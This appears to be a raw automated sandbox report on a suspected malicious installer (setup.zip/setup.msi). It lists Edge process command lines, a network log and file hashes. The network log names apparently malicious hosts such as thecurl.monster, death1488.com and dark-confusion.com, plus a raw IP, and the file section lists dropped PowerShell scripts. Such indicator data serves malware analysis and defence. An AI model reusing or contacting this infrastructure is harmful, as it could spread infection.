C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2496 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3400 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3464 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4048 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4996 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5016 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4908 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5284 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5044 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5204 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=4996 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5824 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5824 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=6108 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5416 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6472 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6476 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6084 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ff8a4342e98,0x7ff8a4342ea4,0x7ff8a4342eb0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2288 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2324 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3064 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3268 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4768 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4768 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3892 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4420 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5140 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5180 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5536 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5528 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5560 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 21.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 210.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.179.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 179.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 thecurl.monster udp
US 172.67.176.123:80 thecurl.monster tcp
US 172.67.176.123:443 thecurl.monster tcp
US 8.8.8.8:53 123.176.67.172.in-addr.arpa udp
US 8.8.8.8:53 death1488.com udp
US 172.67.151.174:80 death1488.com tcp
US 8.8.8.8:53 174.151.67.172.in-addr.arpa udp
US 8.8.8.8:53 the.earth.li udp
US 8.8.8.8:53 iigggkkl.monster udp
US 188.114.97.2:443 iigggkkl.monster tcp
GB 93.93.131.124:443 the.earth.li tcp
US 8.8.8.8:53 2.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 124.131.93.93.in-addr.arpa udp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 raur94.com udp
US 104.21.68.134:80 raur94.com tcp
US 104.21.68.134:443 raur94.com tcp
US 8.8.8.8:53 134.68.21.104.in-addr.arpa udp
US 8.8.8.8:53 checkass.monster udp
US 104.21.2.229:443 checkass.monster tcp
US 8.8.8.8:53 229.2.21.104.in-addr.arpa udp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
GB 142.250.180.3:443 update.googleapis.com tcp
US 13.107.6.158:443 business.bing.com tcp
GB 142.250.180.3:443 update.googleapis.com tcp
US 13.107.6.158:443 business.bing.com tcp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 10.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 2.17.5.133:443 www.microsoft.com tcp
GB 51.11.108.188:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.11.108.188:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.11.108.188:443 nav-edge.smartscreen.microsoft.com tcp
GB 2.17.5.133:443 www.microsoft.com tcp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
FR 13.105.221.27:443 edge-mobile-static.azureedge.net tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
GB 88.221.135.81:443 bzib.nelreports.net tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 27.221.105.13.in-addr.arpa udp
US 8.8.8.8:53 81.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.201.97:443 clients2.googleusercontent.com udp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 133.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 56.104.245.94.in-addr.arpa udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
GB 92.123.128.155:443 www.bing.com tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 155.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 jspm.dev udp
US 8.8.8.8:53 jspm.dev udp
US 205.234.175.175:443 jspm.dev tcp
US 205.234.175.175:443 jspm.dev tcp
US 8.8.8.8:53 175.175.234.205.in-addr.arpa udp
US 8.8.8.8:53 blockchain.info udp
US 8.8.8.8:53 blockchain.info udp
US 104.17.138.37:443 blockchain.info tcp
US 8.8.8.8:53 37.138.17.104.in-addr.arpa udp
US 8.8.8.8:53 dark-confusion.com udp
US 8.8.8.8:53 dark-confusion.com udp
US 188.114.96.2:443 dark-confusion.com tcp
US 188.114.96.2:443 dark-confusion.com tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 188.114.96.2:443 dark-confusion.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 92.123.128.155:443 www.bing.com tcp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 edgestatic.azureedge.net udp
FR 13.105.221.27:443 edgestatic.azureedge.net tcp
FR 13.105.221.27:443 edgestatic.azureedge.net tcp
FR 13.105.221.27:443 edgestatic.azureedge.net tcp
GB 92.123.128.184:443 www.bing.com tcp
US 8.8.8.8:53 184.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
GB 92.123.128.184:443 www.bing.com udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp
GB 2.17.5.133:443 www.microsoft.com tcp
GB 92.123.128.152:443 www.bing.com udp
US 8.8.8.8:53 152.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
GB 2.17.5.133:443 www.microsoft.com tcp
GB 92.123.128.152:443 www.bing.com udp
US 172.67.151.174:80 death1488.com tcp
GB 93.93.131.124:443 the.earth.li tcp
US 172.67.151.174:80 death1488.com tcp
US 188.114.97.2:443 dark-confusion.com tcp
US 104.21.68.134:80 raur94.com tcp
US 104.21.68.134:443 raur94.com tcp
GB 2.17.5.133:443 www.microsoft.com tcp
US 8.8.8.8:53 death1488.com udp
US 172.67.151.174:80 death1488.com tcp
GB 93.93.131.124:443 the.earth.li tcp
GB 93.93.131.124:443 the.earth.li tcp
US 172.67.151.174:80 death1488.com tcp
US 104.21.68.134:80 raur94.com tcp
US 8.8.8.8:53 iigggkkl.monster udp
US 104.21.68.134:443 raur94.com tcp
US 188.114.97.2:443 iigggkkl.monster tcp
US 104.21.68.134:80 raur94.com tcp
US 188.114.97.2:443 iigggkkl.monster tcp
US 104.21.68.134:443 raur94.com tcp
GB 93.93.131.124:443 the.earth.li tcp
US 104.21.68.134:80 raur94.com tcp
US 188.114.97.2:443 iigggkkl.monster tcp
US 104.21.68.134:443 raur94.com tcp
US 104.21.2.229:443 checkass.monster tcp
NL 89.105.201.188:80 89.105.201.188 tcp
US 8.8.8.8:53 188.201.105.89.in-addr.arpa udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
GB 172.165.69.228:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.69.165.172.in-addr.arpa udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
GB 92.123.128.178:443 www.bing.com udp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 178.128.123.92.in-addr.arpa udp
GB 88.221.134.17:443 bzib.nelreports.net tcp
US 8.8.8.8:53 17.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 blockchain.info udp
US 8.8.8.8:53 blockchain.info udp
US 104.17.139.37:443 blockchain.info tcp
US 8.8.8.8:53 37.139.17.104.in-addr.arpa udp
US 8.8.8.8:53 dark-confusion.com udp
US 8.8.8.8:53 dark-confusion.com udp
US 188.114.97.2:443 dark-confusion.com udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.189.173.21:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 21.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 blockchain.info udp
US 8.8.8.8:53 blockchain.info udp
US 8.8.8.8:53 blockchain.info udp
US 104.17.141.37:443 blockchain.info tcp
US 8.8.8.8:53 dark-confusion.com udp
US 8.8.8.8:53 dark-confusion.com udp
US 172.67.158.229:443 dark-confusion.com udp
US 8.8.8.8:53 37.141.17.104.in-addr.arpa udp
US 8.8.8.8:53 229.158.67.172.in-addr.arpa udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 172.165.69.228:443 nav-edge.smartscreen.microsoft.com tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp

Files

C:\Users\Admin\Desktop\x32_x64_installer\setup.zip

MD5 7c58506247a0c7c5554caddff4cbaa79
SHA1 6597d983d2bc026c04d4c5232a1a7ae2f3d4ffc2
SHA256 9e392ff42eef2346a683c2896b5346a1769bc7c2c625a60c677613afe8adb323
SHA512 4496a908877099ab9c9e7cb79b82ba1eba34128d816a242d9567d860893e05aaae0b8accb8d7a8adb0c58fab9a7c4a14357225cbddbdde827d1ac574f10cce4b

C:\Users\Admin\Desktop\x32_x64_installer\setup\setup.msi

MD5 2a612d600e5370ebccb620fdd087eaa4
SHA1 264aa1436f653370ed3b99072f377c8904c68bcc
SHA256 cf76109c76aba7474de8b50e4adabe2790a172a65994a5d7ac66bcc406e1e148
SHA512 dd6db901c971cfe6459a8588873114f6031793a62cce9c1644b7aa9b14d21dd2c30ac02cf6969846fbabf6f2e99e85f03f8e8db3407c90722b851cdc0f22a1c2

C:\Windows\Installer\MSID622.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSIEDF5.tmp

MD5 fb4665320c9da54598321c59cc5ed623
SHA1 89e87b3cc569edd26b5805244cfacb2f9c892bc7
SHA256 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59
SHA512 b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

memory/224-62-0x0000000072FD0000-0x0000000073780000-memory.dmp

memory/224-63-0x0000000004E10000-0x0000000004E20000-memory.dmp

memory/224-64-0x0000000002C60000-0x0000000002C96000-memory.dmp

memory/224-65-0x0000000004E10000-0x0000000004E20000-memory.dmp

memory/224-66-0x0000000005450000-0x0000000005A78000-memory.dmp

memory/224-67-0x0000000005420000-0x0000000005442000-memory.dmp

memory/224-68-0x0000000005C20000-0x0000000005C86000-memory.dmp

memory/224-69-0x0000000005C90000-0x0000000005CF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_romj4si1.yj4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/224-75-0x0000000005D00000-0x0000000006054000-memory.dmp

memory/224-80-0x0000000006300000-0x000000000631E000-memory.dmp

memory/224-81-0x0000000006390000-0x00000000063DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pssEFC8.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

